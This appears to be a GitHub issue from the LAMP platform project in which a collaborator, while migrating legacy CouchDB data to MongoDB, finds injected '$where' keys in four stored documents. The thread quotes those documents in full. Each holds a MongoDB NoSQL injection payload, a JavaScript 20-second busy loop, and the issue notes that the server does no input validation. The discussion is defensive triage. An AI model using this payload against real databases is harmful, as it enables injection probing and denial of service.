search

BIDMCDigitalPsychiatry / LAMP-platform

The LAMP Platform (issues and documentation).
https://docs.lamp.digital/
Other
12 stars 10 forks source link

Strange document keys in legacy CouchDB data #768

Open avaidyam opened 11 months ago

avaidyam commented 11 months ago

From external collaborator:

I managed to get the migration script working. It’s really rough but it works. There is a problem with one of the databases. Are you using “$” symbols somewhere?

I don’t know about the “$” symbol problem and can’t think of anything immediately. [REDACTED], do you know if there would be “$” symbols in the data entered to mindLAMP?

So the problem lies in “activity_event” there’s entries which something like this one: '$where': "if(typeof rng42==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);rng42=1;}" It looks like activity_event defines questions for participants to answer if that helps. Mongo doesn’t allow keys starting with “$”. It feels like someone is trying some inline JavaScript which is clever but very naughty from a security standpoint. The sensor entries are very small. Each seems to hold a single sensor reading so that there’s a lot of entries isn’t surprising but, yes, 2.2B is a lot.

[...] this is in the database not the code. It turns out there’s 4 documents across 3 collections that have this.

Activity doc: qsswfmmaw1e4mp8y686n Sensor doc: w3qrfv85xqkbz3wt8axc Activity Event docs: 03a860854909b6b98bb919deeecd147f, ea1b0c4106318c05beb121501efc08c9

The Doc IDs probably don’t mean anything outside our instance though. I’ve dug all the documents out 3 of them all gave the same #parent (“dolor ut”) they all have at least once instance of basically the same code fragment that’s causing problems namely:

"$where": "if(typeof rng42==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);rng42=1;}"

Which appears to be a 20s busy loop in a MongoDB query. Each document’s copies of the fragment share the same 5 random character variable (“rng42” in this case) and each document’s variable is different. A quick skim through the LAMP-server code shows that there’s no real data validation happening on the repository object. Objects are just passed directly.

Here’s the offending documents with their timestamps converted to AEDT and UTC for convenience:

// Sensor (Fri  4 Feb 2022 16:27:31 AEDT / Fri  4 Feb 2022 05:27:31 UTC):
{
  "_id": "w3qrfv85xqkbz3wt8axc",
  "_rev": "1-640979940c98069ee23927a3e4b362e2",
  "#parent": "dolor ut",
  "timestamp": 1643952451122,
  "spec": "lamp.accelerometer",
  "name": "Accelerometer",
  "settings": {
    "frequency": 5,
    "$where": "if(typeof uzs1i==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);uzs1i=1;}"
  }
}

// Activity (Fri  4 Feb 2022 16:26:41 AEDT / Fri  4 Feb 2022 05:26:41 UTC):
{
  "_id": "qsswfmmaw1e4mp8y686n",
  "_rev": "1-9ccbbf30e3b3bf20e9aea26073f3b47a",
  "#parent": "dolor ut",
  "timestamp": 1643952401879,
  "spec": "lamp.survey",
  "name": "Mood Survey",
  "settings": {
    "questions": [
      {
        "text": "What day is it today?",
        "description": "Please answer based on when you received the notification for this survey.",
        "type": "slider",
        "options": [
          "Sunday",
         "Monday",
          "Tuesday",
          "Wednesday",
          "Thursday",
          "Friday",
          "Saturday"
        ],
        "$where": "if(typeof gxz3a==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gxz3a=1;}"
      }
    ],
    "$where": "if(typeof gxz3a==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gxz3a=1;}"
  },
  "schedule": [
    {
      "start_date": "2020-10-24T14:17:00.000Z",
      "time": "2020-10-23T16:17:33.291Z",
      "repeat_interval": "every3h",
      "custom_time": [
        "2020-10-23T14:18:20.973Z",
        "2020-10-23T14:18:20.973Z",
        "2020-10-23T14:18:20.973Z",
        "2020-10-23T14:18:20.973Z"
      ],
      "$where": "if(typeof gxz3a==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gxz3a=1;}"
    }
  ],
  "category": null
}

// Activity Event (Wed  9 Feb 2022 15:33:21 AEDT / Wed  9 Feb 2022 04:33:21 UTC):
{
  "_id": "ea1b0c4106318c05beb121501efc08c9",
  "_rev": "1-38bbd42a3b16e48eb77a5d7a55081eb7",
  "#parent": "U0671869565",
  "timestamp": 1644381201927,
  "duration": 0,
  "activity": "5vs16btbzbwzeg3m2r15",
  "static_data": {
    "$where": "if(typeof rng42==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);rng42=1;}"
  },
  "temporal_slices": [
    {
      "item": "abcd?",
      "value": "yesh",
      "type": null,
      "level": null,
      "duration": 7290,
      "$where": "if(typeof rng42==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);rng42=1;}"
    }
  ]
}

// Activity Event (Wed 11 Nov 2020 02:26:40 AEDT / Tue 10 Nov 2020 15:26:40 UTC):
{
  "_id": "03a860854909b6b98bb919deeecd147f",
  "_rev": "1-a1587118eceaed00bcead98a33f3f6d2",
  "#parent": "dolor ut",
  "timestamp": 1605022000000,
  "duration": 84123,
  "activity": "2wp97csc3g57ptznhhkg",
  "static_data": {
    "assistance_required": true,
    "mode": "expert",
    "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
  },
  "temporal_slices": [
    {
      "item": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "value": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "type": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "duration": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "level": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
    },
    {
      "item": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "value": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "type": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "duration": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "level": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
    }
  ]
}

//cc FYI @ertjlane @michaelmenon